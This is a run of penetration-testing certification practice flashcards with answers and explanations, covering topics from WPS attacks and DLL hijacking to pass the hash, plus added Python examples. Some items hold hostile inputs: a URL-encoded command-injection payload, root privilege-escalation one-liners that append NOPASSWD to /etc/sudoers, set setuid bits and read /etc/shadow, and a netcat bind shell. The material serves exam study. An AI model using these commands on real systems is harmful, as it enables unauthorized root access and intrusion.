Attacking WPS to get the PIN can help speed up the process of recovering the plaintext value of the PSK.

In the event the router is not susceptible to a WPS PIN attack, an attack to recover the four-way handshake may be warranted.

B is incorrect because Reaver does not support features to recover the four-way handshake during the wireless authentication process.

C is incorrect because Reaver does not support offline attack capabilities to recover the plaintext value of the PSK.

D is incorrect because the PSK can be of any length and difficult to crack using just a simple dictionary.

Recovering the plaintext value of the PSK may require additional time and computing resources.

54
Q

Directory indexing attacks can exploit which feature of a web server?
A.Listing files and other objects within the current directory
B.Authentication bypass
C.Weak access controls
D.None of the above

A

A.Listing files and other objects within the current directory

Explanation:
Directory indexing (directory browsing) is similar to the ls command in Unix or the dir command in Windows.

With directory browsing enabled on the web server and a lack of access controls, an attacker would not have to rely on brute-force methods to derive web pages and/or subdirectories, as they would be exposed from within the current directory.

B is incorrect because authentication bypass is a different type of attack, and it would only be possible if the web server or an application on the server was vulnerable to that type of attack.

C is incorrect because simply being able to list the contents of a web directory remotely does not mean the server has weak access controls.

55
Q

In which scenario(s) can DLL hijacking occur? (Choose all that apply)
A.The attacker has write access to a location or path of a missing DLL that is called during program execution
B.The attacker can create a DLL that is missing during program execution and successfully escalate privileges to SYSTEM
C.The attacker removes DLLs used by the OS in c:/Windows/system32
D.The attacker has read access to the DLL search path for the Windows target

A

A.The attacker has write access to a location or path of a missing DLL that is called during program execution
B.The attacker can create a DLL that is missing during program execution and successfully escalate privileges to SYSTEM

Explanation:
A is correct because write access is required for the location where the DLL should reside; otherwise the attacker will not be able to copy over the malicious DLL to be used in the DLL hijacking attack.

B is correct because the attacker has write access to the location where the DLL should reside, and can replace the missing DLL with a malicious one to escalate privileges on the system.

C is incorrect because removing the DLL from the System32 directory can cause a DoS and prevent applications from functioning, which is the opposite of exploiting a privilege escalation vulnerability using a running program.

D is incorrect because write access, not read access, is required so the malicious DLL used to escalate privileges can be copied to the appropriate DLL path.

56
Q
Which type of social engineering attack can assist an attacker with compromising login credentials or other sensitive information when in close, physical proximity to a victim while he or she is actively working at a computer?
A.Shoulder surfing
B.Baiting
C.Whaling
D.Pretexting
A

A.Shoulder surfing

Explanation:
Shoulder surfing is an observation technique where an attacker pretends to do something else while instead observing what a target is doing, such as typing in a password

57
Q
Which of the following are common methods used to accomplish VLAN hopping on a switched network? (choose all that apply)
A.Double tagging
B.DNS spoofing
C.NAC
D.Switch spoofing
A

A.Double tagging
D.Switch spoofing

Explanation:
A is correct because double tagging is possible when a switch port is configured to use the native VLAN, where an attacker can craft a packet and prepend a false VLAN tag along with the native VLAN tag.

The native VLAN tag (VLAN 1) is stripped since it's the native VLAN, but the false VLAN tag is forwarded to the next switch and the frame is sent to the target host as if it originated from the target's native VLAN.

58
Q

The HTTPOnly attribute that can accompany a Set-Cookie response header is responsible for which of the following?
A.Setting the Secure flag to only allow for SSL connectors
B.Preventing the cookie from being accessed via JavaScript
C.Defining the domain where the cookie is valid
D.Defining the URL where the cookie is valid

A

B.Preventing the cookie from being accessed via JavaScript

Explanation:
The HTTPOnly attribute prevents a user (or attacker) from accessing the cookie value from JavaScript, such as through JavaScript's document.cookie API.

A is incorrect because the Secure flag is a separate attribute in the Set-Cookie header that ensures the cookie never makes its way over a non-encrypted connection, like HTTP.

C is incorrect because the Domain attribute in the Set-Cookie header is used to define the domain where the cookie is valid.

D is incorrect because the Path attribute in the Set-Cookie header is used to define the URL path where the cookie is valid.

59
Q
Which of the following can assist you with brute-forcing a web application login page? (Choose all that apply)
A.Wordlist
B.CeWL
C.Hydra
D.XSS
E.CSRF
A

A.Wordlist
B.CeWL
C.Hydra

Explanation:
A is correct because a wordlist provides login password possibilities based on a dictionary of words and commonly used passwords.

B is correct because CeWL is a tool used to scrape web pages to derive a wordlist with which to target specific organizations.

C is correct because Hydra is a tool used to automate the login process, which allows the pentester to make the most efficient use of their time.

D and E are incorrect. XSS and CSRF can assist in capturing login credentials, user session data, and sensitive information, or in carrying out a malicious action, but neither technique will help brute force a web application login page.

60
Q

During a web vulnerability assessment, you use the Sequencer feature in Burp Suite to evaluate the web application's ability to generate secure session tokens.

Why should session tokens that are used for authentication be randomized? (Select all that apply)
A.To protect against predictable session tokens
B.To prevent session-hijacking attacks
C.To prevent forced browsing attacks
D.To defend against clickjacking attacks

A

A.To protect against predictable session tokens
B.To prevent session-hijacking attacks

Explanation:
A is correct because a lack of randomness in session tokens makes an attacker's life easy when attempting to recover an existing, valid session with the web application.

B is correct because if the session token can be predicted, it can be replayed and the identity of the user would be compromised.

C is incorrect because forced browsing is a result of the web application's or server's authentication scheme being inconsistent, which would allow an unauthenticated user to access portions of a restricted web site/application due to a lack of access controls.

D is incorrect because session tokens do not defend against clickjacking attacks.

61
Q

The customer uses unattended installation files to automate configuration of both physical and virtual hosts on the network.

The remote file share that contains the unattended installation files is writable by everyone on the network.

What mitigation would you recommend to the customer to help secure their network?
A.Lock access to share down based on domain access
B.Restrict access based on IP address
C.Discontinue using unattended installation
D.Restrict write access to only trusted hosts

A

A.Lock access to share down based on domain access
B.Restrict access based on IP address
D.Restrict write access to only trusted hosts

Explanation:
A, B, and D are correct because each enforces an access control that restricts who or what can access the unattended installation file share.

62
Q
In Microsoft Windows, the _____ is used to store credentials in memory after a user successfully logs in to a system
A.Wdigest
B.Kerberos
C.LSASS
D.SAM
A

C.LSASS

Explanation:
The Local Security Authority Subsystem Service (LSASS) is used to store credentials in memory after a user successfully logs in to a system.

The credentials may be an NT LAN Manager (NTLM) password hash, an LM password hash, or even a cleartext password.

This makes credential sharing between trusted applications efficient and does not require the user to enter a username and password every time authentication is required.

63
Q

You are writing the executive summary for your team's pentest report.

You would like to include some findings for senior management.

What is the BEST way of addressing these types of findings?
A.High-level critical findings
B.Impactful low-level details
C.All findings at a high level
D.All findings should be addressed and included in executive summary

A

A.High-level critical findings

Explanation:
The executive summary will include the high-level findings for the pentest report, as senior management has neither the patience nor the technical knowledge to fully appreciate the gory details of the assessment in full.

64
Q

Your team wants to inject packets onto the network by spoofing legitimate hosts using TCP-based services.

Why might this be a difficult task to complete?
A.Predicting the TCP sequence number would be difficult
B.It is easier to spoof legitimate UDP service
C.TCP is an unreliable protocol, which makes it difficult to spoof
D.TCP-based services can be protected behind a host-based firewall

A

A.Predicting the TCP sequence number would be difficult

Explanation:
Spoofing legitimate hosts using TCP-based services is difficult, as the TCP sequence number is difficult to predict.

These sequence numbers are exchanged between hosts while communicating over the network.

65
Q

During a pentest, you are able to establish a foothold in the customer's network on a Linux host inside the DMZ, behind the external firewall.

You want to set up a SOCKS connection using SSH and Proxychains to do TCP and UDP scanning from the compromised Linux host.

What type of proxy should you use in this scenario?
A.SOCKS4
B.SOCKS4a
C.SOCKS5
D.SOCK PROXY
A

C.SOCKS5

Explanation:
A SOCKS5 proxy will allow you to use both TCP and UDP protocols.

All versions of SOCKS server allow for TCP connectivity, but only version 5 supports the ability to relay UDP packets to remote hosts over the SOCKS connection and receive UDP responses through the proxy server.

66
Q

During a compliance scan of a customer's Apache HTTP server, you discover the following in the http.conf file.

What is a potential concern given the output of the compliance scan?

Order Deny,Allow
Deny from all
Allow from all

A.The HTTP server is configured to allow anyone to access, what looks to be, a sensitive part of the web server, which warrants further discussion with the customer
B.The HTTP server is configured to deny all, which would restrict access for valid users
C.The HTTP server contains a sensitive directory that needs to be protected
D.The HTTP server is configured correctly, and there is no call for concern.

A

A.The HTTP server is configured to allow anyone to access, what looks to be, a sensitive part of the web server, which warrants further discussion with the customer

Explanation:
The sensitive directory is open and exposed and allows access from anywhere.

This is a concern as unauthorized individuals may have access to sensitive data in that location

67
Q
Which of the following commands can you use to query information from an organization's OpenLDAP server?
A.searchsploit
B.net group
C.ldapsearch
D.accesschk.exe
A

C.ldapsearch

68
Q

During a pentest, you find that the customer's production-environment Windows servers all had WinRM enabled, which helped facilitate additional attacks against the network with no restriction.

What mitigation strategy would you provide?
A.Lock down WinRM to only trusted hosts on the network
B.Disable the service if not necessary
C.Apply an ACL in Windows Firewall to restrict access to port 5985/tcp to authorized IP addresses
D.All the above

A

D.All the above

69
Q

During a web vulnerability scan, you discover the customer’s web server does not define the X-XSS-Protection header. Given the following scan results from Nikto, how could this type of vulnerability be exploited?
A.Since the header is not defined, the user could potentially be susceptible to a reflected XSS attack within the web browser.
B.The server could be exploited using a command injection attack.
C.The client could be susceptible to a stored CSRF attack that could steal credentials from the user’s web browser.
D.The user would be susceptible to clickjacking attacks.

A

A.Since the header is not defined, the user could potentially be susceptible to a reflected XSS attack within the web browser.

Explanation:
A is correct. The X-XSS-Protection response header is used by various web browsers (such as Internet Explorer, Chrome, and Safari) to prevent malicious pages from loading when a reflected cross-site scripting (XSS) attack is detected.

B, C, and D are incorrect. B is incorrect because this is a client-side attack, not a server-side attack. C is incorrect because the attack vector would be through cross-site scripting (XSS), not cross-site request forgery (CSRF). D is incorrect because there is another web server header to help control those types of attacks, such as the X-Frame-Options header.

70
Q
Which of the following would be a post-engagement activity you may be asked by the customer to conduct?
A.Debrief
B.Executive summary
C.Pentest
D.Testing narrative
A

A.Debrief

Explanation:
The debrief (or outbrief) is a post-engagement activity that the customer may ask for in order to gain a better understanding of the attack paths taken by the pentester or pentest team and to share the pentester’s experiences with more of their support staff.

B, C, and D are incorrect. B is incorrect because the executive summary is a section of the pentest report that documents the pentest activities and high-impact findings in a format that executive leadership, with little to no technical knowledge, can comprehend. C is incorrect because the pentest happens prior to the post-engagement activities. D is incorrect because the testing narrative is a writing style or practice that is applied to the pentest report to help articulate the story of how the pentest was conducted and what findings were identified along the way.

71
Q

Which type of scan method is used to discover hosts listening on the network and leverages the layer 3 ICMP protocol for communicating with hosts over the network?

A.TCP port scan
B.TCP SYN scan
C.Ping scan
D.None of the above
A

C. Ping scan

Explanation:
The ping scan uses the Internet Control Message Protocol (ICMP) to determine the status of a host over the network.

A, B, and D are incorrect. A and B are incorrect because the purpose of communication is to test the hosts’ status by communicating with them over the network using ICMP, not to evaluate the state of a TCP port. D is incorrect because one of the answers (ping scan) is correct.

72
Q

What is the significance of the [R] flag based on the following tcpdump output?
A.The target host is sending a RST to the kali host.
B.The target host is sending a SYN to the kali host.
C.The kali host is sending a RST to the target host.
D.The kali host is sending a SYN to the target host.

A

A.The target host is sending a RST to the kali host.

Explanation:
In the results of the tcpdump output in this scenario, the [R] flag is a RST (reset) flag, informing the kali host to close the connection, as there is either nothing listening on that port or the service on the other end has requested that the connection be terminated.

B, C, and D are incorrect. B is incorrect because the SYN flag is represented in the tcpdump output as [S], not as [R]. C and D are incorrect because the kali host is attempting to connect to the host over multiple ports using a [S] (SYN) flag, and based on the direction (>) of the communication, the [R] (RST) is originating from the target host, not the kali host.

73
Q

The Center for Internet Security (CIS) can provide which of the following?
A.Risk and remediation
B.Pentest report formats
C.Common vulnerabilities and exposures (CVEs)
D.System-hardening guidance

A

D.System-hardening guidance

Explanation:
The Center for Internet Security (CIS) provides security benchmarks that offer system-hardening guidance for various operating systems, applications, and technologies.

A, B, and C are incorrect. A is incorrect because risk and remediation are determined after a security evaluation of a customer's network that takes into account environmental factors and business influences that the CIS benchmarks do not address. B is incorrect because pentest report formats are not provided through the CIS benchmarks; PCI, FedRAMP, and PTES do offer guidance for pentesters on how to lay out the pentest report. C is incorrect because the Common Vulnerabilities and Exposures (CVE) list is maintained by MITRE, not by CIS.

74
Q

During a vulnerability scan of a web server, your team discovers that the fName parameter that gets processed by the request.php page might be susceptible to command injection. However, to bypass the web content filter, your team suggests URL encoding the contents of the fName parameter. Which of the following options would URL encode the value of the fName parameter?

http://www.example.com/request.php?lName=last&fName=first;whoami

A.%66%69%72%73%74%3b%77%68%6f%61%6d%69
B.first;whoami
C.Zmlyc3Q7d2hvYW1p
D.66697273743b77686f616d69

A

A.%66%69%72%73%74%3b%77%68%6f%61%6d%69

Explanation:
A is correct. URL (percent) encoding replaces each byte with a % followed by its two hexadecimal digits (for example, ; becomes %3b), and the web server or framework decodes the value before the application uses it. A content filter that inspects the raw request sees only the encoded form, which is why encoding can bypass it, while request.php still receives first;whoami.

B, C, and D are incorrect. B is incorrect because it is the raw, unencoded parameter value, which is exactly what the content filter is already blocking. C is incorrect because it is the base64 encoding of the value. D is incorrect because it is the plain hexadecimal representation of the ASCII bytes without the % prefixes, so the web server would not decode it back to the original value.

75
Q

During a pentest, you discover a command injection vulnerability in the web application. Which of the following would you recommend to your customer to resolve the issue?
A.Sanitize and validate user-supplied input.
B.Use a custom error page.
C.Apply the appropriate OS hardening.
D.Use a firewall to filter IP addresses.

A

A.Sanitize and validate user-supplied input.

Explanation:
A is correct. Command injection occurs when user-supplied input, such as a URL parameter or a field in an HTTP POST body, is passed into a system command without validation, so that shell metacharacters in the input (;, |, &&, backticks) are executed by the application's underlying operating system.

B, C, and D are incorrect. B is incorrect because a custom error page only controls how an exception is reported; it does not validate the input or stop the command from running, which requires program logic that decides what may and may not be processed by the application. C is incorrect because the vulnerability is in the application, not the operating system, although OS hardening would limit what an injected command could accomplish. D is incorrect because a firewall can reduce the attack surface but does not remediate the vulnerability itself.
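The two questions above fit together: the filter bypass in question 74 works because the server decodes the parameter before the application sees it, and the fix in question 75 is to validate that decoded value and keep it away from a shell. The following is an added example (not the book's or the flashcards' code) that produces the four encodings offered as answers, extracts fName from the URL the way a web framework would, and shows the vulnerable command construction beside a hardened one. The lookup command name and the name allow-list are assumptions for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

def encodings_of(value: str) -> dict:
    """The representations offered in question 74, side by side."""
    raw = value.encode()
    return {
        "percent_all": "".join("%%%02x" % b for b in raw),  # option A: every byte as %XX
        "percent_std": quote(value, safe=""),               # urllib only encodes the reserved ';'
        "plain": value,                                     # option B: no encoding at all
        "base64": base64.b64encode(raw).decode(),           # option C
        "hex": raw.hex(),                                   # option D: hex digits, no % prefix
    }

def param_from_url(url: str, name: str) -> str:
    """What request.php actually receives: the query string is percent-decoded before use."""
    return parse_qs(urlsplit(url).query)[name][0]

def build_command_vulnerable(first_name: str) -> str:
    # VULNERABLE (illustration only): the decoded value is spliced into a shell command line,
    # so "first;whoami" becomes two commands when handed to os.system()/shell=True.
    return "lookup --first %s" % first_name

# Allow-list for a given name: letters, apostrophe, hyphen, space; 1-64 characters (assumption).
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z' -]{0,63}$")

def build_command_hardened(first_name: str):
    """Validate the *decoded* value against an allow-list, then build an argv list so no shell
    ever interprets it (run with subprocess.run(argv) and shell=False). Returns None on reject."""
    if not NAME_RE.fullmatch(first_name):
        return None
    return ["lookup", "--first", first_name]

def handle_request(url: str):
    """Full path: decode the parameter as the server does, then apply the hardened builder."""
    return build_command_hardened(param_from_url(url, "fName"))
```

Validating before decoding (or only on the raw query string) is the mistake the content filter in the scenario makes; the check has to run on the same value the command will use.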

76
Q
Which exception will be printed when the characters 123!@# are provided as input to the program based on the following Python code?
A.Name Error Exception
B.Syntax Error Exception
C.Generic Exception
D.Keyboard Interrupt Exception
A

B.Syntax Error Exception

Explanation:
B is correct. This behavior comes from Python 2's input(), which evaluates whatever the user types as a Python expression: text such as 123!@# (or $%^&*) is not valid Python, so the interpreter raises SyntaxError while parsing it. Because the program has a handler for that exception, the print statement outputs "Syntax Error Exception" and the loop continues, letting the user try again until a valid integer is entered. Without the handler, the uncaught SyntaxError would terminate the program with Python's built-in error message. Note that Python 3's input() returns a plain string, so the same characters passed to int() raise ValueError rather than SyntaxError.

A, C, and D are incorrect. A is incorrect because NameError is raised when an unrecognized local or global name is referenced. C is incorrect because the generic handler is never reached: the SyntaxError and NameError handlers already cover the malformed input. D is incorrect because KeyboardInterrupt is raised when the user presses CTRL-C, not by typed characters; it also derives from BaseException rather than Exception, so a generic except Exception clause does not catch it.
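The program the question refers to is not reproduced on this page. As an added example (not the book's or the flashcards' code), here is a Python 3 model of the input loop it describes, with the Python 2 evaluate-the-input behavior stood in for by ast.literal_eval (an assumption made so the legacy case can run safely; never use eval() on user input). The scripted answers are constructed.

```python
import ast

def read_number_py3(text: str):
    """Python 3 style: input() returns a string and int() is the parser.
    Returns (value, None) on success or (None, label) for the handler's message."""
    try:
        return int(text), None
    except ValueError:
        return None, "Value Error Exception"

def read_number_legacy(text: str):
    """Model of Python 2's input(), which parsed the typed text as a Python expression.
    ast.literal_eval stands in for that here: '123!@#' is not valid syntax -> SyntaxError."""
    try:
        value = ast.literal_eval(text)
    except SyntaxError:
        return None, "Syntax Error Exception"
    except ValueError:
        return None, "Value Error Exception"
    if isinstance(value, bool) or not isinstance(value, int):
        return None, "Not an integer"
    return value, None

def prompt_loop(inputs, reader=read_number_py3):
    """Drive the retry loop over a scripted list of answers instead of a terminal.
    The log holds each handler message printed, then the first accepted integer."""
    log = []
    for text in inputs:
        try:
            value, err = reader(text)
        except KeyboardInterrupt:          # CTRL-C: a BaseException, so it needs its own clause
            log.append("Keyboard Interrupt Exception")
            break
        if err:
            log.append(err)                # stay in the loop, ask again
            continue
        log.append(value)
        break
    return log
```

The reader is injected so the same loop can be exercised with either parser; the difference in which exception fires is the whole point of the question.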

77
Q

During a wireless survey of a customer’s network, you discover multiple BSSIDs. In regard to wireless communications, what is the purpose of the BSSID?

A.Describes the unique MAC address of the access point
B.Describes the name of the WLAN
C.Describes the name of the distribution system (DS)
D. Describes the MAC address of the wireless client
A

A.Describes the unique MAC address of the access point

Explanation:
The Basic Service Set Identifier (BSSID) is used to describe the unique MAC address of the access point. This provides network clarity when multiple access points are on the same wireless local area network (WLAN) broadcasting the same SSID.

B, C, and D are incorrect. B is incorrect because the Service Set Identifier (SSID) is the name given to the wireless network. C is incorrect because the distribution system (DS) is the backbone that connects multiple access points on the network. D is incorrect because a wireless client's (station's) MAC address identifies that client, not the BSS.

78
Q
Which of the following hash types is used in pass the hash (PtH) attacks?
A.MD5
B.SHA256
C.NTLM
D.NTLMv2
A

C.NTLM

Explanation:
C is correct. The NT hash (commonly called the NTLM hash) is stored in the Security Account Manager (SAM) database on the local computer, or in the NTDS.dit database on a domain controller. Because NTLM authentication proves knowledge of the hash rather than of the password, an attacker who obtains the NT hash can authenticate to remote services without ever cracking it; that is the pass the hash (PtH) technique.

A, B, and D are incorrect. A and B are incorrect because MD5 and SHA256 are general-purpose digests, not the credential format Windows uses for NTLM authentication, so they play no part in PtH. D is incorrect because NTLMv2 (Net-NTLMv2) values are challenge/response results: they are computed from the user's NT hash, the server's challenge, and a client challenge, so a captured response is bound to that one exchange and cannot be replayed later to authenticate. It can, however, be relayed to another host while the exchange is still in flight, which is what NTLM relay attacks do.
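To make the distinction concrete, the following added example (not from the book or the flashcards) derives the NT hash the way Windows does, MD4 over the UTF-16LE password, and then the NTLMv2 key and challenge-bound response that are computed from it. MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable under OpenSSL 3. The "User"/"Domain"/"Password" values are the test vectors published in the MS-NLMP specification; the server challenges and client blob used for the response comparison are constructed.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF

def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32

def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320). Pure Python: hashlib.new('md4') is often missing under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        # (boolean function, message-word order, per-step rotate amounts, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for f, order, shifts, k in rounds:
            for i in range(16):
                a = _rotl((a + f(b, c, d) + x[order[i]] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c      # rotate the registers for the next step
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password. This is what sits in the SAM/NTDS.dit and what PtH reuses."""
    return md4(password.encode("utf-16-le"))

def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed with the NT hash over UPPERCASE(user) + domain in UTF-16LE.
    Only the NT hash is needed here, never the password."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()

def ntlmv2_proof(ntowf2: bytes, server_challenge: bytes, temp: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 over the 8-byte server challenge and the client blob (timestamp,
    client challenge, target info). Bound to this exchange, so it cannot be replayed later."""
    return hmac.new(ntowf2, server_challenge + temp, hashlib.md5).digest()
```

The asymmetry the question tests falls out of the code: nt_hash() alone lets you compute a fresh ntlmv2_proof() for any challenge a server issues (pass the hash), whereas a sniffed proof is useless against a different challenge, which is why Net-NTLMv2 captures are cracked offline or relayed live rather than replayed.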

79
Q

During the active scanning phase of the internal PCI DSS pentest, you discover a Windows XP SP1 host on the customer’s legacy network, which looks to be part of the point-of-sale system. Which of the following Microsoft (MS) bulletins are applicable to the Windows XP SP1 operating system, that are susceptible to vulnerabilities you could likely exploit remotely against the target to get a SYSTEM-level shell? (Choose all that apply.)

A.MS06-040
B.MS08-067
C.MS10-092
D.MS10-087

A

A.MS06-040
B.MS08-067

Explanation:
A and B are correct. MS06-040 and MS08-067 each document an unauthenticated, remotely exploitable vulnerability in the Windows Server service of older Microsoft operating systems, such as XP, that allows arbitrary code execution with SYSTEM privileges.

C and D are incorrect. C is incorrect because the MS10-092 documents a vulnerability with the Windows Task Scheduler that allows for local privilege escalation. D is incorrect because MS10-087 documents a vulnerability in Microsoft Office that is remotely exploitable but would only provide user-level privileges.

80
Q
During a wireless pentest, your team has asked you to recover the four-way handshake for a WPA2 network. Which type of attack will you execute?
A.Deauthentication attack
B.Wi-Fi jamming
C.Downgrade attack
D.Repeating
A

A.Deauthentication attack

Explanation:
A deauthentication attack will force the wireless client to deauthenticate from the WPA2 wireless network, and when the client reestablishes the connection with the access point, you will be able to capture the handshake.

B, C, and D are incorrect. B is incorrect because Wi-Fi jamming (or RF jamming) is an illegal technique used to block radio frequencies originating from legitimate devices that rely on RF, such as equipment found in hospitals. C is incorrect because downgrade attacks are used to target weak encryption protocols or ciphers for man-in-the-middle attacks. D is incorrect because repeating is used to extend a wireless network for clients outside the range of a wireless access point.

81
Q

Given the following nmap command syntax, what is the purpose of the –T flag?

nmap –n –sSV –T4 192.168.1.0/24

A.A template used by nmap that is followed by a number, <0-5>, to determine how many seconds to execute the scan for (that is, 0–5 seconds in total).
B.An aggressive timing template used by nmap to enhance the speed of the scan, and is not concerned with accuracy.
C.A timing template used by nmap to conserve bandwidth and resource utilization on the target machine.
D.A timing template used by nmap to be sneaky when conducting port scans against a remote target machine.

A

B.An aggressive timing template used by nmap to enhance the speed of the scan, and is not concerned with accuracy.

Explanation:
The nmap -T flag selects a timing template that tells the scanner how fast or how cautious to be, rather than the tester setting the individual timing options (such as --min-rate or --max-retries) by hand. -T0 (paranoid) and -T1 (sneaky) are used to slip under IDS thresholds, -T2 (polite) slows down to conserve bandwidth and resources on the target, -T3 (normal) is the default when no option is given, -T4 (aggressive) speeds the scan up on the assumption of a fast and reliable network, and -T5 (insane) trades accuracy for speed. Both -T4 and -T5 should only be used when network bandwidth is not limited.

A, C, and D are incorrect. When the -T flag is used, Nmap will determine the timing for you. The number <0-5> passed after the –T flag will determine the template to use, and does not represent the number of seconds to execute the scan for. –T <2> is used to conserve network bandwidth, and the –T <0-1> templates are used to be sneaky and evade IDS.

82
Q
Which of the following SQL statements can be used to retrieve records from an RDBMS?
A.DELETE
B.INSERT
C.SELECT
D.UPDATE
A

C.SELECT

Explanation:
The SELECT statement is used to retrieve a record from the database.

A, B, and D are incorrect. A is incorrect because the DELETE statement is used to remove a record from the database. B is incorrect because the INSERT statement is used to create a new instance of a record in the database. D is incorrect because the UPDATE statement is used to update an existing record in the database.

83
Q

Which of the following statements is true about the following example?
A.The ldapsrv host sends a reverse shell back to the kali host.
B.The ldapsrv host starts a listener on port 443, and the kali host connects to the bind shell.
C.The ldapsrv host starts a listener on port 443, and the kali host connects to the reverse shell.
D.The ldapsrv host starts a reverse shell, and the kali host connects to the shell over port 443.

A

B.The ldapsrv host starts a listener on port 443, and the kali host connects to the bind shell.

Explanation:
B is correct. A bind shell opens a socket on the target host and listens for remote connections; when a connection arrives on that port, the victim serves up an interactive operating system shell. In this example, the netcat command was executed on the ldapsrv host to start a TCP listener on port 443. When the kali host connected to port 443, the -e flag caused netcat to run /bin/sh and attach it to the connection, giving the kali side an interactive shell with the privileges of the account that started netcat on ldapsrv (root, in the example). A bind shell is useful when there is no firewall in front of the target, or when the chosen port is permitted inbound through it.

A, C, and D are incorrect because the example uses a bind shell for the connection, not a reverse shell.

84
Q

When should you dispose of the customer’s pentest report and sensitive data? (Choose the BEST answer.)

A. Never.
B.Once the customer confirms receipt of the pentest report.
C.After the customer debrief.
D.The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE.
A

D.The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE.

Explanation: Once the customer has provided confirmation of successfully receiving and extracting the report, all remaining digital or written copies of the report should be marked for proper disposal and deletion, based on agreed-upon methods outlined in the rules of engagement (RoE).

A, B, and C are incorrect. A is incorrect because the pentest report should be removed based on the disposal requirements defined by the customer. B is incorrect because once the customer confirms receipt of the pentest report, it can be deleted; however, the RoE can also define when the report should be properly disposed of. C is incorrect because the debrief is a post-engagement activity that happens after the customer has acknowledged receipt of the pentest report and has had time to digest its content. They can then request a debrief (or “outbrief”), if necessary.

85
Q

The runme.py script is executed through a root cron-job every day from the NFS share called /share. The permissions on the script allow anyone to write to the file. You have user-level privileges as the “user1” account on the Linux target where the cron-job is executed from. Which of the following options could you append to the script to further exploit the target? (Choose all that apply.)
A.os.system('chmod 4777 /bin/bash')
B.os.system('cp /bin/vi /share; chmod 4777 /share/vi')
C.os.system('cat /etc/shadow')
D.os.system('echo "user1 ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers')

A

B.os.system('cp /bin/vi /share; chmod 4777 /share/vi')
D.os.system('echo "user1 ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers')

Explanation:
B and D are correct. B is correct because you can use a system call to copy the vi command (as root) to the NFS share and apply a setuid bit on the executable. When the new vi command is executed, you can escape the shell and execute commands as root. D is correct because you can echo a line into the /etc/sudoers file so that your user account can execute commands as root with no password.

A and C are incorrect. A is incorrect because bash, like most modern shells, drops privileges when started setuid: if its effective UID differs from its real UID and it was not invoked with -p, it resets the effective UID to the real UID, so the setuid bit alone does not yield a root shell. C is incorrect because the output of cat /etc/shadow goes to the cron job's stdout (typically mailed to root or discarded), not to your terminal; redirecting the output to a world-readable file on the share would make the shadow file readable to you.
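The defender's counterpart to this question is finding the misconfiguration before someone appends to the script. The following is an added example (not the book's or the flashcards' code) that parses an /etc/crontab-style listing, flags root jobs whose script is world-writable, and lists setuid files on a share directory, which is the artifact option B leaves behind. The scenario is built in a temporary directory, so the paths are constructed. Whether a setuid binary on an NFS share actually elevates depends on the mount: exports default to root_squash and clients often mount with nosuid, both of which defeat option B.

```python
import os
import re
import stat
import tempfile

# /etc/crontab format: five time fields (or an @shortcut), the user, then the command.
CRON_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")
INTERPRETERS = {"python", "python3", "sh", "bash", "perl"}

def parse_system_crontab(text: str):
    """Return (user, command) pairs, skipping comments, blank lines and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs

def script_path(cmd: str):
    """First absolute path in the command that is not the interpreter itself."""
    for tok in cmd.split():
        if tok.startswith("/") and os.path.basename(tok) not in INTERPRETERS:
            return tok
    return None

def audit_root_cron(crontab_text: str):
    """Flag root cron jobs whose script anyone can modify: the exact condition in the question."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        path = script_path(cmd)
        if path is None or not os.path.exists(path):
            continue
        mode = os.stat(path).st_mode
        if mode & stat.S_IWOTH:
            findings.append((path, "world-writable script executed by root cron"))
    return findings

def find_setuid(dirpath: str):
    """List regular files with the setuid or setgid bit under dirpath (e.g. a copied vi)."""
    hits = []
    for root, _dirs, files in os.walk(dirpath):
        for name in files:
            p = os.path.join(root, name)
            m = os.lstat(p).st_mode
            if stat.S_ISREG(m) and m & (stat.S_ISUID | stat.S_ISGID):
                hits.append(p)
    return sorted(hits)

def demo():
    """Constructed scenario: a mode-777 runme.py run by root, plus a setuid copy of vi on the share."""
    share = tempfile.mkdtemp(prefix="share-")
    script = os.path.join(share, "runme.py")
    with open(script, "w") as fh:
        fh.write("#!/usr/bin/env python3\nprint('nightly job')\n")
    os.chmod(script, 0o777)
    planted = os.path.join(share, "vi")
    open(planted, "w").close()
    os.chmod(planted, 0o4777)
    crontab = "SHELL=/bin/sh\n# m h dom mon dow user command\n0 3 * * * root /usr/bin/python3 %s\n" % script
    return audit_root_cron(crontab), find_setuid(share)
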